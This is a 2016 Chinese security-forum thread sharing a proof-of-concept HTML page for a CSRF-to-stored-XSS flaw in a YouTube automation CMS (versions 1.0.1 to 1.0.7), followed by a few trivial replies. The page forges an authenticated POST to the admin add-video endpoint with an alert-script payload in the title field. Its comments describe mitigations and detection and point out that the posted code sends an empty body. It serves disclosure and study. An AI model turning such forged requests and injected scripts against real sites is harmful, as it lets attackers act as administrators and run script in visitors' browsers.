90_ 发表于 2016-10-19 16:14:15

YouTube 自动化CMS 1.0.7两处XSS

演示视频:https://youtu.be/cCtThSquNSk

CSRF to 持续性 XSS
Version: 1.0.1 to 1.0.7

CSRF Exploit Code:
<!--
  Proof-of-concept page for the CSRF-to-stored-XSS reported against this CMS (versions 1.0.1 to 1.0.7).
  What the page demonstrates, read from the defender's side:
    - the admin action /admin/videos.php?case=add accepts a state-changing POST issued from a
      foreign origin with the victim's session cookies attached (xhr.withCredentials = true),
      and none of the submitted fields carries an anti-CSRF token;
    - the "title" field is, per the report, rendered back without escaping, so a script tag
      stored in it executes for every viewer of the video list (the persistent XSS).
  Server-side mitigations: a per-session CSRF token validated on every state-changing request,
  an Origin/Referer check on the admin endpoints, SameSite on the session cookie, and
  context-aware output escaping of title/details. Detection: admin POSTs whose Origin or
  Referer is not the site's own origin, or whose title field contains markup.
-->
<html>
<body>
   <!-- <title> belongs in <head>; left exactly as posted -->
   <title> CSRF to Persistent XSS</title>
    <script>
      // Assembles and fires the forged admin request when the button below is clicked.
      function submitRequest()
      {
      var xhr = new XMLHttpRequest();
      // Target is the admin "add video" action; "victim.com" is a placeholder for the
      // vulnerable installation. The video URL travels in the query string, the rest as form data.
      xhr.open("POST", "http://victim.com/admin/videos.php?case=add&youtube_video_url=https://sophosnews.files.wordpress.com/2016/02/anonymous.jpg", true);
      // Accept, Accept-Language and a multipart/form-data Content-Type are all CORS-safelisted,
      // so the browser issues this cross-origin POST without a preflight request.
      xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
      xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
      xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=---------------------------1681718590736");
      // Attach the victim's ambient session cookies: this is what turns the forged POST into
      // an authenticated admin action. A SameSite cookie or a CSRF token would defeat it.
      xhr.withCredentials = true;
      // Hand-built multipart body, presumably mirroring the CMS's own add-video form
      // (field names: title, details, category_id, thumbnail, published, duration, image, submit).
      var body = "-----------------------------1681718590736\r\n" +
          "Content-Disposition: form-data; name=\"title\"\r\n" +
          "\r\n" +
          // The stored payload lives in "title". \x3e / \x3c are JS escapes for > and <, so the
          // literal tag text does not terminate this page's own <script> block.
          "\"\x3e\x3cscript\x3ealert(/XSSed-By-Arbin/)\x3c/script\x3e\r\n" +
          "-----------------------------1681718590736\r\n" +
          "Content-Disposition: form-data; name=\"details\"\r\n" +
          "\r\n" +
          "\r\n" +
          "-----------------------------1681718590736\r\n" +
          "Content-Disposition: form-data; name=\"category_id\"\r\n" +
          "\r\n" +
          "1\r\n" +
          "-----------------------------1681718590736\r\n" +
          "Content-Disposition: form-data; name=\"thumbnail\"; filename=\"\"\r\n" +
          "Content-Type: application/octet-stream\r\n" +
          "\r\n" +
          "\r\n" +
          "-----------------------------1681718590736\r\n" +
          "Content-Disposition: form-data; name=\"published\"\r\n" +
          "\r\n" +
          "1\r\n" +
          "-----------------------------1681718590736\r\n" +
          "Content-Disposition: form-data; name=\"duration\"\r\n" +
          "\r\n" +
          "70\r\n" +
          "-----------------------------1681718590736\r\n" +
          "Content-Disposition: form-data; name=\"image\"\r\n" +
          "\r\n" +
          "https://sophosnews.files.wordpress.com/2016/02/anonymous.jpg\r\n" +
          "-----------------------------1681718590736\r\n" +
          "Content-Disposition: form-data; name=\"submit\"\r\n" +
          "\r\n" +
          "\r\n" +
          "-----------------------------1681718590736--\r\n";
      // NOTE(review): as posted, aBody is overwritten with a number on every iteration and
      // send() receives an empty Blob, so the assembled body above is not what goes on the
      // wire; the endpoint sees the POST with no form fields. Kept verbatim from the report.
      var aBody = new Uint8Array(body.length);
      for (var i = 0; i < aBody.length; i++)
          aBody = body.charCodeAt(i);
      xhr.send(new Blob());
      }
    </script>
    <!-- Presentational markup (<center>, <font>, inline onclick) as posted; only the button's click triggers the request. -->
    <br><br><br>
    <center>
    <h2><font color="red"> CSRF to Persistent XSS by Arbin</font></h2>
    <form action="#">
      <input type="button" value="Submit request" onclick="submitRequest();" />
    </form>
</center>
</body>
</html>

08sec-君子 发表于 2016-10-19 17:36:27

谢谢分享

apptest 发表于 2016-10-19 18:06:21

APP回复测试

Te5tB99 发表于 2016-10-19 18:07:14

test?http://www.huc08.com//mobcent//app/data/phiz/default/03.pnghttp://www.huc08.com//mobcent//app/data/phiz/default/03.png

xiaoye 发表于 2016-10-19 18:18:06

http://www.huc08.com/data/appbyme/upload/audio/201610/19/eljvJwuk7uo2.mp3

admia 发表于 2016-10-20 17:15:39

我他妈一直新手上路